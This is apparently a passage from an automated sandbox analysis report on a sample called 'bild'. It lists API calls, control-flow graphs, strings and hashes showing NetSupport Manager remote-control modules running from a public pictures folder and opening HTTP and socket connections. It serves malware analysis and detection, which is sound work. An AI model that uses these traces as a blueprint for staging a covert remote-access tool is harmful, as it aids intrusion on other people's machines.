                                                                                                                • Part of subcall function 6C7B1B69: __NMSG_WRITE.LIBCMT ref: 6C7B1B89
                                                                                                                • Part of subcall function 6C7B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C7BD3C1,6C7B6E81,00000001,6C7B6E81,?,6C7BF447,00000018,6C7D7738,0000000C,6C7BF4D7), ref: 6C7B1BAE
                                                                                                              • _memset.LIBCMT ref: 6C7A71D3
                                                                                                              • _calloc.LIBCMT ref: 6C7A7214
                                                                                                              • _malloc.LIBCMT ref: 6C7A728B
                                                                                                              • _memset.LIBCMT ref: 6C7A72C1
                                                                                                              • _malloc.LIBCMT ref: 6C7A72CD
                                                                                                              • _memset.LIBCMT ref: 6C7A7303
                                                                                                              • GetTickCount.KERNEL32 ref: 6C7A7361
                                                                                                              • CreateThread.KERNEL32(00000000,00004000,6C7A6BA0,00000000,00000000,6C7DBACC), ref: 6C7A737E
                                                                                                              • SetThreadPriority.KERNEL32(00000000,00000001), ref: 6C7A73AC
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Pictures\Support\,00000104), ref: 6C7A7430
                                                                                                              • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\Public\Pictures\Support\pci.ini), ref: 6C7A74B0
                                                                                                              • GetModuleHandleA.KERNEL32(nsmtrace), ref: 6C7A74C0
                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6C7A7566
                                                                                                              • timeBeginPeriod.WINMM(00000001), ref: 6C7A7573
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                                                              • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$927537$C:\Users\Public\Pictures\Support\$C:\Users\Public\Pictures\Support\pci.ini$General$HTCTL32$NSM165348$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                                              • API String ID: 3160247386-4222038145
                                                                                                              • Opcode ID: 234c1f4158d4609481b763f7104786c5e2ca3057db4eb39a276feebb953c5759
                                                                                                              • Instruction ID: 097aa38a6b545c2f359bb644778bd7af14e1485704138a3b00362e168a04b633
                                                                                                              • Opcode Fuzzy Hash: 234c1f4158d4609481b763f7104786c5e2ca3057db4eb39a276feebb953c5759
                                                                                                              • Instruction Fuzzy Hash: AFD126B1A00315AFDB10AFB59E8C9567BB8FB45349F060A39F809E7B40E731BD458B90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 979 11029590-1102961e LoadLibraryA 980 11029621-11029626 979->980 981 11029628-1102962b 980->981 982 1102962d-11029630 980->982 983 11029645-1102964a 981->983 984 11029632-11029635 982->984 985 11029637-11029642 982->985 986 11029679-11029685 983->986 987 1102964c-11029651 983->987 984->983 985->983 990 1102972a-1102972d 986->990 991 1102968b-110296a3 call 11162b51 986->991 988 11029653-1102966a GetProcAddress 987->988 989 1102966c-1102966f 987->989 988->989 992 11029671-11029673 SetLastError 988->992 989->986 994 11029748-11029760 InternetOpenA 990->994 995 1102972f-11029746 GetProcAddress 990->995 1001 110296c4-110296d0 991->1001 1002 110296a5-110296be GetProcAddress 991->1002 992->986 999 11029784-11029790 call 11162be5 994->999 995->994 998 11029779-11029781 SetLastError 995->998 998->999 1005 11029796-110297c7 call 11142290 call 11164390 999->1005 1006 11029a0a-11029a14 999->1006 1008 110296d2-110296db GetLastError 1001->1008 1009 110296f1-110296f3 1001->1009 1002->1001 1004 11029762-1102976a SetLastError 1002->1004 1004->1008 1030 110297c9-110297cc 1005->1030 1031 110297cf-110297e4 call 11081a70 * 2 1005->1031 1006->980 1012 11029a1a 1006->1012 1008->1009 1010 110296dd-110296ef call 11162be5 call 11162b51 1008->1010 1014 11029710-1102971c 1009->1014 1015 110296f5-1102970e GetProcAddress 1009->1015 1010->1009 1017 11029a2c-11029a2f 1012->1017 1014->990 1034 1102971e-11029727 1014->1034 1015->1014 1019 1102976f-11029777 SetLastError 1015->1019 1021 11029a31-11029a36 1017->1021 1022 11029a3b-11029a3e 1017->1022 1019->990 1026 11029b9f-11029ba7 1021->1026 1027 11029a40-11029a45 1022->1027 1028 11029a4a 1022->1028 1032 11029bb0-11029bc3 1026->1032 1033 11029ba9-11029baa FreeLibrary 1026->1033 1035 11029b6f-11029b74 1027->1035 1036 11029a4d-11029a55 1028->1036 1030->1031 1054 110297e6-110297ea 1031->1054 1055 110297ed-110297f9 1031->1055 1033->1032 1034->990 1037 11029b76-11029b8d GetProcAddress 1035->1037 1038 11029b8f-11029b95 1035->1038 1040 11029a57-11029a6e GetProcAddress 1036->1040 1041 11029a74-11029a7d 1036->1041 1037->1038 1043 11029b97-11029b99 SetLastError 1037->1043 1038->1026 1040->1041 1042 11029b2e-11029b30 SetLastError 1040->1042 1045 11029a80-11029a82 1041->1045 1047 11029b36-11029b3d 1042->1047 1043->1026 1045->1047 1049 11029a88-11029a8d 1045->1049 1050 11029b4c-11029b6d call 110278a0 * 2 1047->1050 1049->1050 1052 11029a93-11029acf call 1110f4a0 call 11027850 1049->1052 1050->1035 1080 11029ae1-11029ae3 1052->1080 1081 11029ad1-11029ad4 1052->1081 1054->1055 1056 11029824-11029829 1055->1056 1057 110297fb-110297fd 1055->1057 1064 1102982b-1102983c GetProcAddress 1056->1064 1065 1102983e-11029855 InternetConnectA 1056->1065 1061 11029814-1102981a 1057->1061 1062 110297ff-11029812 GetProcAddress 1057->1062 1061->1056 1062->1061 1067 1102981c-1102981e SetLastError 1062->1067 1064->1065 1069 11029881-1102988c SetLastError 1064->1069 1070 110299f7-11029a07 call 111618c1 1065->1070 1071 1102985b-1102985e 1065->1071 1067->1056 1069->1070 1070->1006 1075 11029860-11029862 1071->1075 1076 11029899-110298a1 1071->1076 1082 11029864-11029877 GetProcAddress 1075->1082 1083 11029879-1102987f 1075->1083 1078 110298a3-110298b7 GetProcAddress 1076->1078 1079 110298b9-110298d4 1076->1079 1078->1079 1084 110298d6-110298de SetLastError 1078->1084 1090 110298e1-110298e4 1079->1090 1086 11029ae5 1080->1086 1087 11029aec-11029af1 1080->1087 1081->1080 1085 11029ad6-11029ada 1081->1085 1082->1083 1088 11029891-11029893 SetLastError 1082->1088 1083->1076 1084->1090 1085->1080 1091 11029adc 1085->1091 1086->1087 1092 11029af3-11029b09 call 110d1090 1087->1092 1093 11029b0c-11029b0e 1087->1093 1088->1076 1098 110299f2-110299f5 1090->1098 1099 110298ea-110298ef 1090->1099 1091->1080 1092->1093 1096 11029b10-11029b12 1093->1096 1097 11029b14-11029b25 call 111618c1 1093->1097 1096->1097 1102 11029b3f-11029b49 call 111618c1 1096->1102 1097->1050 1110 11029b27-11029b29 1097->1110 1098->1070 1101 11029a1c-11029a29 call 111618c1 1098->1101 1104 110298f1-11029908 GetProcAddress 1099->1104 1105 1102990a-11029916 1099->1105 1101->1017 1102->1050 1104->1105 1109 11029918-11029920 SetLastError 1104->1109 1114 11029922-1102993b GetLastError 1105->1114 1109->1114 1110->1036 1115 11029956-1102996b 1114->1115 1116 1102993d-11029954 GetProcAddress 1114->1116 1119 11029975-11029983 GetLastError 1115->1119 1116->1115 1117 1102996d-1102996f SetLastError 1116->1117 1117->1119 1120 11029985-1102998a 1119->1120 1121 1102998c-11029998 GetDesktopWindow 1119->1121 1120->1121 1122 110299e2-110299e7 1120->1122 1123 110299b3-110299cf 1121->1123 1124 1102999a-110299b1 GetProcAddress 1121->1124 1122->1098 1126 110299e9-110299ef 1122->1126 1123->1098 1128 110299d1 1123->1128 1124->1123 1125 110299d6-110299e0 SetLastError 1124->1125 1125->1098 1126->1098 1128->1090
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(WinInet.dll,E43C2CA5,74DF23A0,?,00000000), ref: 110295C5
                                                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102965F
                                                                                                              • SetLastError.KERNEL32(00000078), ref: 11029673
                                                                                                              • _malloc.LIBCMT ref: 11029697
                                                                                                              • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110296B1
                                                                                                              • GetLastError.KERNEL32 ref: 110296D2
                                                                                                              • _free.LIBCMT ref: 110296DE
                                                                                                              • _malloc.LIBCMT ref: 110296E7
                                                                                                              • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029701
                                                                                                              • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102973B
                                                                                                              • InternetOpenA.WININET(11194244,?,?,000000FF,00000000), ref: 1102975A
                                                                                                              • SetLastError.KERNEL32(00000078), ref: 11029764
                                                                                                              • SetLastError.KERNEL32(00000078), ref: 11029771
                                                                                                              • SetLastError.KERNEL32(00000078), ref: 1102977B
                                                                                                              • _free.LIBCMT ref: 11029785
                                                                                                                • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029805
                                                                                                              • SetLastError.KERNEL32(00000078), ref: 1102981E
                                                                                                              • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029831
                                                                                                              • InternetConnectA.WININET(000000FF,11199690,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102984E
                                                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102986A
                                                                                                              • SetLastError.KERNEL32(00000078), ref: 11029883
                                                                                                              • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110298A9
                                                                                                              • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110298FD
                                                                                                              • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029A63
                                                                                                              • SetLastError.KERNEL32(00000078), ref: 11029B30
                                                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029B82
                                                                                                              • SetLastError.KERNEL32(00000078), ref: 11029B99
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 11029BAA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                                              • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                              • API String ID: 921868004-913974648
                                                                                                              • Opcode ID: 2d2eeaad931a34bca1b43c66b17deac4db3cf30db8dfadc355f34a03c0ad81b1
                                                                                                              • Instruction ID: e81a0880bf89439be6f70403065d0babe3f5b16467f55efefddb7e1ac6149969
                                                                                                              • Opcode Fuzzy Hash: 2d2eeaad931a34bca1b43c66b17deac4db3cf30db8dfadc355f34a03c0ad81b1
                                                                                                              • Instruction Fuzzy Hash: 5E127FB0D04269EBEB11CFA9CC88A9EFBF9FF88754F604569E465E7240E7705940CB60
                                                                                                              APIs
                                                                                                                • Part of subcall function 11144EA0: GetLastError.KERNEL32(?,0276B878,000000FF,?), ref: 11144ED5
                                                                                                                • Part of subcall function 11144EA0: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0276B878,000000FF,?), ref: 11144EE5
                                                                                                              • _fgets.LIBCMT ref: 11061DC2
                                                                                                              • _strpbrk.LIBCMT ref: 11061E29
                                                                                                              • _fgets.LIBCMT ref: 11061F2C
                                                                                                              • _strpbrk.LIBCMT ref: 11061FA3
                                                                                                              • __wcstoui64.LIBCMT ref: 11061FBC
                                                                                                              • _fgets.LIBCMT ref: 11062035
                                                                                                              • _strpbrk.LIBCMT ref: 1106205B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                                              • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                                              • API String ID: 716802716-1571441106
                                                                                                              • Opcode ID: 32dce6010c3087015648dbee5c865c0eda81171851eef29cc693b610d01e18e4
                                                                                                              • Instruction ID: 9b454a0e08db4b844aa329f9a873b431930d9d904307df7fc69ae15b9a8492e5
                                                                                                              • Opcode Fuzzy Hash: 32dce6010c3087015648dbee5c865c0eda81171851eef29cc693b610d01e18e4
                                                                                                              • Instruction Fuzzy Hash: 55A2D375E0461A9FEB21CF64CC80BEFB7B9AF44345F0041D9E849A7281EB71AA45CF61

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1906 11143570-111435b1 GetModuleFileNameA 1907 111435f3 1906->1907 1908 111435b3-111435c6 call 11081b40 1906->1908 1909 111435f9-111435fd 1907->1909 1908->1907 1917 111435c8-111435f1 LoadLibraryA 1908->1917 1911 111435ff-1114360c LoadLibraryA 1909->1911 1912 11143619-11143637 GetModuleHandleA GetProcAddress 1909->1912 1911->1912 1914 1114360e-11143616 LoadLibraryA 1911->1914 1915 11143647-11143670 GetProcAddress * 4 1912->1915 1916 11143639-11143645 1912->1916 1914->1912 1918 11143673-111436eb GetProcAddress * 10 call 11161d01 1915->1918 1916->1918 1917->1909 1920 111436f0-111436f3 1918->1920
                                                                                                              APIs
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,74DF23A0), ref: 111435A3
                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 111435EC
                                                                                                              • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11143605
                                                                                                              • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11143614
                                                                                                              • GetModuleHandleA.KERNEL32(?), ref: 1114361A
                                                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1114362E
                                                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114364D
                                                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11143658
                                                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11143663
                                                                                                              • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114366E
                                                                                                              • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11143679
                                                                                                              • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11143684
                                                                                                              • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114368F
                                                                                                              • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114369A
                                                                                                              • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 111436A5
                                                                                                              • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 111436B0
                                                                                                              • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 111436BB
                                                                                                              • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 111436C6
                                                                                                              • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111436D1
                                                                                                              • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111436DC
                                                                                                                • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                                              • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                                              • API String ID: 3874234733-2061581830
                                                                                                              • Opcode ID: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                                              • Instruction ID: 707b91cc949213dae1a505c6abf15ec2f20ed18dfa7402eb99b54f6ccfa65761
                                                                                                              • Opcode Fuzzy Hash: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                                              • Instruction Fuzzy Hash: 05411B70A04714AFD7309F768D84A6BFAF8BF55A04B10492EE496D3A10EBB5E8008F5D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1921 6c79a980-6c79a9e7 call 6c795840 1924 6c79a9ed-6c79a9f0 1921->1924 1925 6c79aa9c 1921->1925 1924->1925 1927 6c79a9f6-6c79a9fb 1924->1927 1926 6c79aaa2-6c79aaae 1925->1926 1928 6c79aab0-6c79aac5 call 6c7b28e1 1926->1928 1929 6c79aac6-6c79aacd 1926->1929 1927->1925 1930 6c79aa01-6c79aa06 1927->1930 1933 6c79ab48-6c79ab58 socket 1929->1933 1934 6c79aacf-6c79aad7 1929->1934 1930->1925 1932 6c79aa0c-6c79aa21 EnterCriticalSection 1930->1932 1938 6c79aa89-6c79aa9a LeaveCriticalSection 1932->1938 1939 6c79aa23-6c79aa2b 1932->1939 1935 6c79ab5a-6c79ab6f WSAGetLastError call 6c7b28e1 1933->1935 1936 6c79ab70-6c79abc9 #21 * 2 call 6c795e90 1933->1936 1934->1933 1940 6c79aad9-6c79aadc 1934->1940 1950 6c79abe8-6c79ac1f bind 1936->1950 1951 6c79abcb-6c79abe3 #21 1936->1951 1938->1926 1943 6c79aa30-6c79aa39 1939->1943 1940->1933 1944 6c79aade-6c79ab05 call 6c79a5c0 1940->1944 1947 6c79aa49-6c79aa51 1943->1947 1948 6c79aa3b-6c79aa3f 1943->1948 1958 6c79ab0b-6c79ab2f WSAGetLastError call 6c7930a0 1944->1958 1959 6c79ad4a-6c79ad69 EnterCriticalSection 1944->1959 1947->1943 1954 6c79aa53-6c79aa5e LeaveCriticalSection 1947->1954 1948->1947 1952 6c79aa41-6c79aa47 1948->1952 1955 6c79ac41-6c79ac49 1950->1955 1956 6c79ac21-6c79ac40 WSAGetLastError closesocket call 6c7b28e1 1950->1956 1951->1950 1952->1947 1957 6c79aa60-6c79aa88 LeaveCriticalSection call 6c7b28e1 1952->1957 1954->1926 1962 6c79ac59-6c79ac64 1955->1962 1963 6c79ac4b-6c79ac57 1955->1963 1971 6c79ae82-6c79ae92 call 6c7b28e1 1958->1971 1973 6c79ab35-6c79ab47 call 6c7b28e1 1958->1973 1964 6c79ad6f-6c79ad7d 1959->1964 1965 6c79ae50-6c79ae80 LeaveCriticalSection GetTickCount InterlockedExchange 1959->1965 1970 6c79ac65-6c79ac83 htons WSASetBlockingHook call 6c797610 1962->1970 1963->1970 1972 6c79ad80-6c79ad86 1964->1972 1965->1971 1979 6c79ac88-6c79ac8d 1970->1979 1976 6c79ad88-6c79ad90 1972->1976 1977 6c79ad97-6c79ae0f InitializeCriticalSection call 6c798fb0 call 6c7b0ef0 1972->1977 1976->1972 1981 6c79ad92 1976->1981 1994 6c79ae18-6c79ae4b getsockname 1977->1994 1995 6c79ae11 1977->1995 1984 6c79ac8f-6c79acc5 WSAGetLastError WSAUnhookBlockingHook closesocket call 6c7930a0 call 6c7b28e1 1979->1984 1985 6c79acc6-6c79accd 1979->1985 1981->1965 1989 6c79accf-6c79acd6 1985->1989 1990 6c79ad45 WSAUnhookBlockingHook 1985->1990 1989->1990 1993 6c79acd8-6c79acfb call 6c79a5c0 1989->1993 1990->1959 1993->1990 2000 6c79acfd-6c79ad2c WSAGetLastError WSAUnhookBlockingHook closesocket call 6c7930a0 1993->2000 1994->1965 1995->1994 2000->1971 2003 6c79ad32-6c79ad44 call 6c7b28e1 2000->2003
                                                                                                              APIs
                                                                                                                • Part of subcall function 6C795840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6C798F91,00000000,00000000,6C7DB8DA,?,00000080), ref: 6C795852
                                                                                                              • EnterCriticalSection.KERNEL32(6C7DB898,?,00000000,00000000), ref: 6C79AA11
                                                                                                              • LeaveCriticalSection.KERNEL32(6C7DB898), ref: 6C79AA58
                                                                                                              • LeaveCriticalSection.KERNEL32(6C7DB898), ref: 6C79AA68
                                                                                                              • LeaveCriticalSection.KERNEL32(6C7DB898), ref: 6C79AA94
                                                                                                              • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6C79AB0B
                                                                                                              • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6C79AB4E
                                                                                                              • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6C79AB5A
                                                                                                              • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C79AB8E
                                                                                                              • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C79ABB1
                                                                                                              • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C79ABE3
                                                                                                              • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C79AC18
                                                                                                              • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C79AC21
                                                                                                              • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C79AC29
                                                                                                              • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C79AC65
                                                                                                              • WSASetBlockingHook.WSOCK32(6C7963A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C79AC76
                                                                                                              • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C79AC8F
                                                                                                              • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C79AC96
                                                                                                              • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C79AC9C
                                                                                                              • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C79ACFD
                                                                                                              • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C79AD04
                                                                                                              • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C79AD0A
                                                                                                              • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C79AD45
                                                                                                              • EnterCriticalSection.KERNEL32(6C7DB898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C79AD4F
                                                                                                              • InitializeCriticalSection.KERNEL32(-6C7DCB4A), ref: 6C79ADE6
